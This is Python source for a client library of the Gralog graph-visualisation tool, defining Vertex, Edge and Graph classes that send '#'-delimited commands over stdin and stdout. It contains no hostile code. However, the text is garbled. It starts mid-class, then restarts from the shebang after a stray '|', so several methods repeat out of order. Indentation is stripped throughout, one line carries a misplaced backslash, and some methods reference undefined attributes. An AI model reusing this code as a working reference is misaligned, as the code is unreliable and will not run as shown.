if not (colorHex == -1):
line = line + hexFormatter(colorHex)
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexRadius(self, vertex, newRadius):
self.setVertexDimension(vertex, newRadius, "radius")
def setVertexHeight(self, vertex, newHeight):
self.setVertexDimension(vertex, newHeight, "height")
def setVertexWidth(self, vertex, newWidth):
self.setVertexDimension(vertex, newWidth, "width")
def setVertexDimension(self, vertex, newDimension, dimension):
vertex = vertexId(vertex)
line = "setVertexDimension#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip()
print(line.rstrip())
sys.stdout.flush()
def setVertexShape(self, vertex, shape):
vertex = vertexId(vertex)
line = "setVertexShape#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip()
print(line.rstrip())
sys.stdout.flush()
def setEdgeWeight(self, edge, weight):
self.setEdgeProperty(edge, "weight", weight)
def setEdgeThickness(self, edge, thickness):
self.setEdgeProperty(edge, "thickness", thickness)
def setEdgeProperty(self, edge, propertyName, value):
line = "setEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setVertexProperty(self, vertex, propertyName, value):
line = "setVertexProperty#"+str(self.id).rstrip() + "#"
line = line + str(vertexId(vertex)).rstrip()
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setEdgeLabel(self, edge, label):
line = "setEdgeLabel#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + label
print(line.rstrip())
sys.stdout.flush()
def setVertexLabel(self, vertex, label):
vertex = vertexId(vertex)
line = "setVertexLabel#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label
print(line.rstrip())
sys.stdout.flush()
# end: best for private use!
def setGraph(self, graphFormat, graphString = "hello_world"):
graphFormat = graphFormat.lower()
line = "setGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#"
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$$\n"
line += graphString
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$\n"
print(line)
sys.stdout.flush()
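    # Example (sketch): g.setGraph("tgf", "1\n2\n#\n1 2\n") should replace the graph
    # currently shown in Gralog with a two-vertex, one-edge graph given in TGF; the
    # payload is wrapped in the $$ ... $ markers expected on the Gralog side.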
# TODO: implement this
# end setter functions
# getter functions
def toIgraph(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ig = ig.Graph.Read_GraphML("tmp.graphml")
os.remove("tmp.graphml")
return g_ig
def toNx(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_nx = nx.read_graphml("tmp.graphml")
os.remove("tmp.graphml")
return g_nx
def toElementTree(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ET = ET.parse("tmp.graphml")
os.remove("tmp.graphml")
return g_ET
def toXml(self):
return self.getGraph("xml")
def getGraph(self, graphFormat):
# warning!! importing as pure TGF will mean edge id's will
# be lost. This will result in errors on the Gralog side.
line = "getGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()
print(line.rstrip())
i = 0
sys.stdout.flush()
line = sys.stdin.readline()
graphString = ""
if graphFormat.lower() == "tgf" or graphFormat.lower() == "gtgf":
tgf = graphFormat.lower() == "tgf"
multiline = False
first = False
if line[0] == line[1] == '$':
multiline = True
if tgf:
first = True
line = sys.stdin.readline()
hashtagSeen = False
if not multiline:
return graphString
while line[0] != '$':
# gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$'))
graphString += line
if line[0] == '#':
hashtagSeen = True
else:
if not first:
if hashtagSeen:
if tgf:
self.edgifyTGFCommand(line)
else:
self.edgifyGTGFCommand(line)
else:
if tgf:
self.vertexifyTGFCommand(line)
else:
self.vertexifyGTGFCommand(line)
line = sys.stdin.readline()
i += 1
first = False
return graphString
if graphFormat.lower() == "xml":
return line
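    # Note: fetching the graph in "gtgf"/"tgf" form also rebuilds the local
    # id_to_vertex / id_to_edge caches as a side effect (via the vertexify*/edgify*
    # helpers above), which is how the Graph(format=None) constructor attaches to the
    # graph already open in Gralog.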
def getAllVertices(self):
# return: list of Vertex objects with id
line = "getAllVertices#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vertexIdStringList = (sys.stdin.readline()).split("#")
vertexList = []
for vertexIdString in vertexIdStringList:
if representsInt(vertexIdString):
v = self.getVertexOrNew(vertexIdString)
vertexList.append(v)
return vertexList
def getVertices(self):
return(self.getAllVertices())
def getAllEdges(self):
# return: list of fully sourced Edge objects with fully sourced endpoint Vertices
line = "getAllEdges#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
if len(endpointList) == 1 and endpointList[-1] == "\n":
endpointList = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdges(self):
return(self.getAllEdges())
# start: best for private use!
def getNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
neighbourIdStringList = (sys.stdin.readline()).split("#")
neighboursList = []
for neighbourIdString in neighbourIdStringList:
if representsInt(neighbourIdString):
v = self.getVertexOrNew(neighbourIdString)
neighboursList.append(v)
return neighboursList
def getOutgoingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getOutgoingNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
outgoingNeighbourIdStringList = (sys.stdin.readline()).split("#")
outgoingNeighboursList = []
for outgoingNeighbourIdString in outgoingNeighbourIdStringList:
if representsInt(outgoingNeighbourIdString):
v = self.getVertexOrNew(outgoingNeighbourIdString)
outgoingNeighboursList.append(v)
return outgoingNeighboursList
def getIncomingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getIncomingNeighbours#"+str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
incomingNeighbourIdStringList = (sys.stdin.readline()).split("#")
incomingNeighboursList = []
for incomingNeighbourIdString in incomingNeighbourIdStringList:
if representsInt(incomingNeighbourIdString):
v = self.getVertexOrNew(incomingNeighbourIdString)
incomingNeighboursList.append(v)
return incomingNeighboursList
def getIncidentEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncidentEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getAdjacentEdges(self, edge):
# return: list of Edge objects with id's only
line = "getAdjacentEdges#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getOutgoingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getOutgoingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getIncomingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncomingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdgeWeight(self, edge):
return self.getEdgeProperty(edge, "weight")
def getEdgeLabel(self, edge):
return self.getEdgeProperty(edge, "label")
def getEdgeProperty(self, edge, prop):
# internally: fill edge property dictionary
# return: String representing queried property
line = "getEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge.getProperty(prop)
def getVertexProperty(self, vertex, prop):
# internally: fill edge property dictionary
# return: String representing queried property
vid = vertexId(vertex)
line = "getVertexProperty#"+str(self.id).rstrip() + "#"
        line = line + str(vid).rstrip()
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex.getProperty(prop)
# end: best use privately!
def requestVertex(self):
line = "requestVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestRandomVertex(self):
line = "requestRandomVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestEdge(self):
line = "requestEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(vid)
return edge
def requestRandomEdge(self):
line = "requestRandomEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(eid)
return edge
def requestInteger(self):
line = "requestInteger#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
i = sys.stdin.readline().rstrip()
return int(i)
def requestFloat(self):
line = "requestFloat#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
d = sys.stdin.readline().rstrip()
return float(d)
def requestString(self):
line = "requestString#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
st = sys.stdin.readline().rstrip()
return str(st)
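    # The request* methods above presumably block until the user supplies the
    # requested vertex/edge/number/string on the Gralog side; from here they are
    # plain blocking reads on stdin, e.g.:
    #   v = g.requestVertex()
    #   n = g.requestInteger()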
# runtime changer functions
def pauseUntilSpacePressed(self, *args):
line = "pauseUntilSpacePressed"
rank = None
try:
rank = int(args[0])
except:
pass
if len(args) > 0 and rank != None:
rank = int(args[0])
args = args[1:]
argString = ""
if rank != None:
argString += "#"+str(rank).rstrip()
for key in sorted(self.variablesToTrack.keys()):
term = "#("+str(key).rstrip()+"=" + \ str(self.variablesToTrack[key]).rstrip()+")"
argString = argString + term.rstrip()
for x in args:
if len(x) != 2:
argString = "#(syntax=pauseUntilSpacePressed((key, val)))"
break
if (type(x) == list):
for each in x:
term = "#("+"arrayyyy"+str(each[0])+"="+str(each[1])+")"
argString = argString + term
else:
term = "#("+str(x[0])+"="+str(x[1])+")"
argString = argString + term.rstrip()
line = line + argString
print(line)
sys.stdout.flush()
toSkip = sys.stdin.readline()
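    # e.g. g.pause(("step", i), ("weight", w)) suspends execution until space is
    # pressed in Gralog (the blocking read above) and sends the given (key, value)
    # pairs along for display; variables registered via track() are shown as well.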
def track(self, name, var):
# ideally, something like this:
self.variablesToTrack[name] = var # if this is a pointer, it will work
# if it is an int or str, or some other non-reference type, it will not
def unTrack(self, name):
del self.variablesToTrack[name]
def sendMessage(self, toSend):
print(toSend)
sys.stdout.flush()
def message(self, message):
print("message#"+str(self.id).rstrip() + "#"+str(message).rstrip())
sys.stdout.flush()
def sendErrorToGralog(self, toSend):
print("error#"+str(self.id).rstrip() + "#"+str(toSend).rstrip())
sys.stdout.flush()
exit()
def mistakeLine(self):
print("wubbadubdub 3 men in a tub")
sys.stdout.flush()
sys.stdin.readline()
def pause(self, *args):
self.pauseUntilSpacePressed(*args)
# end runtime changer functions
def __str__(self):
vertices = [str(v) for v in self.id_to_vertex]
vertices.sort()
edges = [str(e) for e in self.getEdges()]
edges.sort()
return "VERTICES: " + " ".join(vertices) + "\nEDGES: " + " ".join(edges)
def gPrint(message):
if not message: # empty: print nothing except the new line (hacked with \t; <space> doesn't work)
print("gPrint#-1#" + "\t")
sys.stdout.flush()
else:
message = str(message)
lines = message.split('\n')
for line in lines:
print("gPrint#-1#" + line)
sys.stdout.flush()
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
| #!/usr/bin/env python3
import sys
from random import randint
import os
try:
import networkx as nx
except:
print("gPrint#-1#" + "netwrokx not installed for " + sys.executable)
sys.stdout.flush()
try:
import igraph as ig
except:
print("gPrint#-1#" + "igraph not installed for " + sys.executable)
import xml.etree.cElementTree as ET
import math
# debugging = False
class Vertex:
def __init__(self, graph, vid):
self.sourced = False
self.id = int(vid)
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["strokeColor"] = None
self.properties["shape"] = None
self.properties["coordinates"] = None
self.incomingEdges = []
self.outgoingEdges = []
self.incidentEdges = []
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
valueType = ""
try:
prop = propVal[0]
valueType = propVal[1]
except:
pass
try:
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
castedValue = self.graph.castValueToType(val, typ)
self.properties[prop] = castedValue
except:
pass
def getId(self):
return self.id
def getLabel(self):
if not self.wasSourced:
self.source()
return self.properties["label"]
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setVertexLabel(self.id, label)
def setCoordinates(self, coordinates):
co = self.properties["coordinates"]
x = coordinates[0]
y = coordinates[1]
if co == None:
co = (None, None)
if x == None:
x = co[0]
if y == None:
y = co[1]
newCoordinates = (x, y)
self.properties["coordinates"] = newCoordinates
self.graph.setVertexCoordinates(self.id, newCoordinates)
def setFillColor(self, colorHex=-1, colorRGB=-1):
self.setColor(colorHex, colorRGB)
def getFillColor(self):
return self.getColor()
def getColor(self):
if not self.wasSourced:
self.source()
return self.properties["color"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["fillColor"] = colorHex
elif colorRGB != -1:
self.properties["fillColor"] = colorRGB
else:
return
self.graph.setVertexFillColor(self.id, colorHex, colorRGB)
def setStrokeColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["strokeColor"] = colorHex
elif colorRGB != -1:
self.properties["strokeColor"] = colorRGB
else:
return
self.graph.setVertexStrokeColor(self.id, colorHex, colorRGB)
def getStrokeColor(self):
if not self.sourced:
self.source()
return self.properties["strokeColor"]
def setRadius(self, radius):
self.properties["radius"] = radius
self.properties["width"] = radius
self.properties["height"] = radius
self.graph.setVertexRadius(self.id, radius)
def setWidth(self, width):
self.properties["width"] = width
self.graph.setVertexWidth(self.getId(), width)
def setHeight(self, height):
self.properties["height"] = height
self.graph.setVertexHeight(self.getId(), height)
def setShape(self, shape):
self.properties["shape"] = shape
self.graph.setVertexShape(self.id, shape)
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setVertexProperty(self.id, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
if not self.sourced:
self.source()
return self.properties[prop]
def getNeighbours(self):
return self.graph.getNeighbours(self.id)
def getOutgoingNeighbours(self):
return self.graph.getOutgoingNeighbours(self.id)
def getIncomingNeighbours(self):
return self.graph.getIncomingNeighbours(self.id)
def getOutgoingEdges(self):
return self.graph.getOutgoingEdges(self.id)
def getIncomingEdges(self):
return self.graph.getIncomingEdges(self.id)
def getIncidentEdges(self):
return self.graph.getIncidentEdges(self.id)
def delete(self):
return self.graph.deleteVertex(self)
def connect(self, v1, edgeId=-1):
return self.graph.addEdge(self, v1, edgeId)
def getAllEdgesBetween(self, vertex2):
return self.graph.getAllEdgesBetween((self.id, vertex2))
def source(self):
return self.graph.getVertex(self)
def __str__(self):
return str(self.getId())
# what if i want to get a vertex? should i also get all its neighbours? how about incident edges? This is all v aufw\"andig and leads to the paradigm by which we just store the grpah in python???
class Edge:
# private methods
def __init__(self, graph, eid):
self.sourced = False
self.id = int(eid) #if -2, then imported without id like in TGF
self.graph = graph
self.properties = dict()
self.properties["id"] = None
self.properties["label"] = None
self.properties["color"] = None
self.properties["weight"] = None
self.properties["contour"] = None
self.properties["source"] = None
self.properties["target"] = None
self.wasSourced = False
def sourceProperties(self, stringFromGralog):
self.sourced = True
strings = stringFromGralog.split("#")
for string in strings:
propVal = string.split("=")
try:
prop = propVal[0]
valueType = propVal[1]
valueType = valueType.split("|")
val = valueType[0]
typ = valueType[1]
self.properties[prop] = self.graph.castValueToType(val, typ)
except:
pass
def setTarget(self, target): # don't use!!
self.properties["target"] = target
def setSource(self, source):
self.properties["source"] = source
# public methods
def getId(self):
return self.id
def setLabel(self, label):
label = str(label)
self.properties["label"] = label
self.graph.setEdgeLabel(self.id, label)
def getLabel(self):
if not self.sourced:
self.source()
return self.properties["label"]
def setColor(self, colorHex=-1, colorRGB=-1):
if colorHex != -1:
self.properties["color"] = colorHex
elif colorRGB != -1:
self.properties["color"] = colorRGB
else:
return
self.graph.setEdgeColor(self.id, colorHex, colorRGB)
def getColor(self):
if not self.sourced:
self.source()
return self.properties["color"]
def setWeight(self, weight):
self.properties["weight"] = float(weight)
self.graph.setEdgeWeight(self.id, weight)
def getWeight(self):
if not self.sourced:
self.source()
return self.properties["weight"]
def setThickness(self, thickness):
self.properties["thickness"] = float(thickness)
self.graph.setEdgeThickness(self.id, thickness)
def getThickness(self):
if not self.sourced:
self.source()
return self.properties["thickness"]
def setContour(self, contour):
self.properties["contour"] = contour
self.graph.setEdgeContour(self.id, contour)
def getContour(self):
if not self.sourced:
self.source()
return self.properties["contour"]
def getSource(self):
if not self.sourced:
self.source()
return self.properties["source"]
def getTarget(self):
if not self.sourced:
self.source()
return self.properties["target"]
def setProperty(self, otherProperty, value):
self.properties[otherProperty] = value
self.graph.setEdgeProperty(self, otherProperty, value)
def getProperty(self, otherProperty):
if not self.sourced:
self.source()
return self.properties[otherProperty]
def get(self, prop):
self.source()
return self.properties[prop]
def delete(self):
return self.graph.deleteEdge(self.id)
def source(self):
return self.graph.getEdge(self)
def getAdjacentEdges(self):
return self.graph.getAdjacentEdges(self.id)
def __str__(self):
v = self.getId()
v_str = str(v)
source = self.getSource().getId()
target = self.getTarget().getId()
return "({:},{:})".format(source, target)
def rgbFormatter(colorRGB):
r = colorRGB[0]
g = colorRGB[1]
b = colorRGB[2]
s = "rgb"
s += "(" + str(r).rstrip() + "," + \
str(g).rstrip() + "," + str(b).rstrip() + ")"
return s.rstrip()
def hexFormatter(colorHex):
s = "hex"
if colorHex[0] == "#":
colorHex = colorHex[1:]
s += "("+str(colorHex).rstrip() + ")"
return s.rstrip()
def vertexId(vertex):
if isinstance(vertex, Vertex):
return vertex.getId()
return vertex
def edgeId(edge):
if isinstance(edge, Edge):
return edge.getId()
return edge
def extractIdFromProperties(stringFromGralog):
strings = stringFromGralog.split(",")
for string in strings:
propVal = string.split("=")
if propVal[0] == "id":
return propVal[1]
return None
def edgeSplitter(edge):
if type(edge) == tuple and len(edge) == 2: # edge as defined by start, end nodes
return str(vertexId(edge[0])).rstrip()+","+str(vertexId(edge[1])).rstrip()
if type(edge) == int: # edge is given by id
return str(edge).rstrip()
return str(edge.getId()).rstrip()#edge has type Edge
class Graph:
def __init__(self, format="Undirected Graph"):
# perform analysis of graph
self.id_to_vertex = dict()
self.id_to_edge = dict()
self.lastIndex = -1
self.id = -1
self.variablesToTrack = dict()
if format == None or format.lower() == "none":
# we want a new graph
print("useCurrentGraph")
sys.stdout.flush()
self.lastIndex = -1
self.id = sys.stdin.readline()
self.getGraph("gtgf")
else:
print(format)
sys.stdout.flush()
self.id = sys.stdin.readline()
# helper functions
def castValueToType(self, val, typ):
if typ == "float":
return float(val)
if typ == "int":
return int(val)
if typ == "bool":
return bool(val)
if typ == "string":
return str(val)
if typ == "vertex":
return self.getVertexOrNew(val)
return val
def getVertexOrNew(self, currId):
v = currId
if (isinstance(currId, str)):
currId = int(currId)
if (isinstance(currId, int)):
if currId in self.id_to_vertex:
v=self.id_to_vertex[currId]
else:
v=Vertex(self, currId)
self.id_to_vertex[currId] = v
return v
def getEdgeOrNew(self, currId):
if type(currId) == tuple:
e = self.getEdgeIdByEndpoints(currId)
return e
e = currId
if not (isinstance(currId, Edge)):
try:
e = self.id_to_edge[int(currId)]
except:
e = Edge(self, currId)
else:
gPrint("Error (getEdgeOrNew()): the argument \
is neither an edge id nor a pair of vertices.")
return e
def termToEdge(self, term):
endpoints = term.split(",")
eid = int(endpoints[0])
e = self.id_to_edge[eid]
e.sourceProperties(endpoints[0])
sourceId = int(endpoints[1])
source = self.getVertexOrNew(sourceId)
targetId = int(endpoints[2])
target = self.getVertexOrNew(targetId)
e.setSource(source)
e.setTarget(target)
return e
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
def edgifyTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
e = self.getEdgeOrNew(-2)
e.setSource(v1)
e.setTarget(v2)
def vertexifyTGFCommand(self, line):
line = line.strip()
vString = line[0]
v = self.getVertexOrNew(int(vString))
self.vertices[v.getId()] = v
def edgifyGTGFCommand(self, line):
line = line.strip()
endpoints = line.split(" ")
v1String = endpoints[0]
v1 = self.getVertexOrNew(int(v1String))
v2String = endpoints[1]
v2 = self.getVertexOrNew(int(v2String))
eid = int(endpoints[2])
e = self.getEdgeOrNew(eid)
e.setSource(v1)
e.setTarget(v2)
self.id_to_edge[eid] = e
def vertexifyGTGFCommand(self, line):
self.vertexifyTGFCommand(line)
def getEdgeIdByEndpoints(self, endpoints):
line = "getEdgeIdByEndpoints#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(endpoints)
print(line.rstrip())
sys.stdout.flush()
edgeId = sys.stdin.readline().rstrip()
return edgeId
def getVertex(self, vertex):
line = "getVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print (line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex
def getEdge(self, edge):
line = "getEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print (line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge
# end helper functions
# Graph Manipulating Functions
def addVertex(self, vertexId=-1, pos=(None, None)):
# return: Vertex object with id
line = "addVertex#" + str(self.id).rstrip()
x = -1
y = -1
vertexIdSwap = False
if type(vertexId) == tuple and pos == (None, None):
x = vertexId[0]
y = vertexId[1]
vertexId = -1
else:
x = pos[0]
y = pos[1]
if vertexId != -1:
line += "#"+str(vertexId).rstrip()
if x != None and y != None:
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
vid = sys.stdin.readline()
v = Vertex(self, vid)
self.id_to_vertex[v.getId()] = v
return v
def deleteVertex(self, v):
edges = self.getIncidentEdges(v)
for e in edges:
del self.id_to_edge[e.getId()]
v = vertexId(v)
del self.id_to_vertex[v]
print("deleteVertex#" + str(self.id).rstrip() + "#" + str(v))
sys.stdout.flush()
def addEdge(self, sourceVertex, targetVertex, edgeId = -1):
# return: Edge object with id only
sourceVertex = vertexId(sourceVertex)
targetVertex = vertexId(targetVertex)
idSubString = ""
if not edgeId == -1:
idSubString = "#"+str(edgeId)
line = "addEdge#"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \
"#" + str(targetVertex).rstrip() + idSubString.rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline()
if eid != "\n": # it's possible that the edge cannot be added (e.g., a new selfloop)
e = Edge(self, eid)
self.id_to_edge[e.getId()] = e
return e
return None
def existsEdge(self, edge):
line = "existsEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
thereExistsAnEdge = sys.stdin.readline().rstrip()
return thereExistsAnEdge.lower() == "true"
def existsVertex(self, vertex):
line = "existsVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
thereExistsAVertex = sys.stdin.readline().rstrip()
return thereExistsAVertex.lower() == "true"
def deleteEdge(self, edge):
del self.id_to_edge[edge.getId()]
line = "deleteEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
def getAllEdgesBetween(self, vertexPair):
line = "getAllEdgesBetween#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(vertexPair)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
# creates a random Erdos-Reny graph with n id_to_vertex and edge probability p
def generateRandomGraph(self, vertexCount, p):
if not isinstance(vertexCount, int):
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number must be an int.")
if vertexCount < 0:
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number cannot be less than 0.")
if not isinstance(p, float) or p < 0 or p > 1.0:
gPrint("Cannot generate a random graph, wrong parameter: \
probability of an edge must be a float in [0,1].")
if vertexCount == 0:
return
vertices = []
coordinates = dict()
for id in range(vertexCount):
coordinates[id] = (10*math.cos(2*id*math.pi/vertexCount),
10*math.sin(2*id*math.pi/vertexCount))
nxgraph = nx.fast_gnp_random_graph(vertexCount, p)
d = dict()
id = 0
for nxV in nxgraph.nodes():
d[id] = nxV
id += 1
nxEdges = nxgraph.edges()
id = 0
for x in range(vertexCount):
vertices.append(self.addVertex(id, coordinates[id]))
id += 1
for x in vertices:
for y in vertices:
if x.getId() < y.getId():
if (d[x.getId()], d[y.getId()]) in nxEdges:
x.connect(y)
# end manilupative functions
# setter functions
# begin: best for private use!
def setVertexFillColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
line = "setVertexFillColor#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1):
try:
line = line + rgbFormatter(colorRGB)
except:
self.sendErrorToGralog("the rgb color: " + str(colorRGB).rstrip() + " is not properly formatted!")
else:
self.sendErrorToGralog("neither Hex nor RGB color specified!")
print(line.rstrip())
sys.stdout.flush()
def setVertexStrokeColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
# print("colorhex: " + str(colorHex))
line = "setVertexStrokeColor#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexCoordinates(self, vertex, coordinates):
line = "setVertexCoordinates#" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip()
x = -1
y = -1
x = coordinates[0]
y = coordinates[1]
if x == None:
x = "empty"
if y == None:
y = "empty"
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
def setEdgeContour(self, edge, contour):
line = line = "setEdgeContour#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + str(contour).rstrip()
print(line)
sys.stdout.flush()
def setEdgeColor(self, edge, colorHex=-1, colorRGB=-1):
line = "setEdgeColor#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#"
if not (colorHex == -1):
line = line + hexFormatter(colorHex)
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexRadius(self, vertex, newRadius):
self.setVertexDimension(vertex, newRadius, "radius")
def setVertexHeight(self, vertex, newHeight):
self.setVertexDimension(vertex, newHeight, "height")
def setVertexWidth(self, vertex, newWidth):
self.setVertexDimension(vertex, newWidth, "width")
def setVertexDimension(self, vertex, newDimension, dimension):
vertex = vertexId(vertex)
line = "setVertexDimension#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip()
print(line.rstrip())
sys.stdout.flush()
def setVertexShape(self, vertex, shape):
vertex = vertexId(vertex)
line = "setVertexShape#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip()
print(line.rstrip())
sys.stdout.flush()
def setEdgeWeight(self, edge, weight):
self.setEdgeProperty(edge, "weight", weight)
def setEdgeThickness(self, edge, thickness):
self.setEdgeProperty(edge, "thickness", thickness)
def setEdgeProperty(self, edge, propertyName, value):
line = "setEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
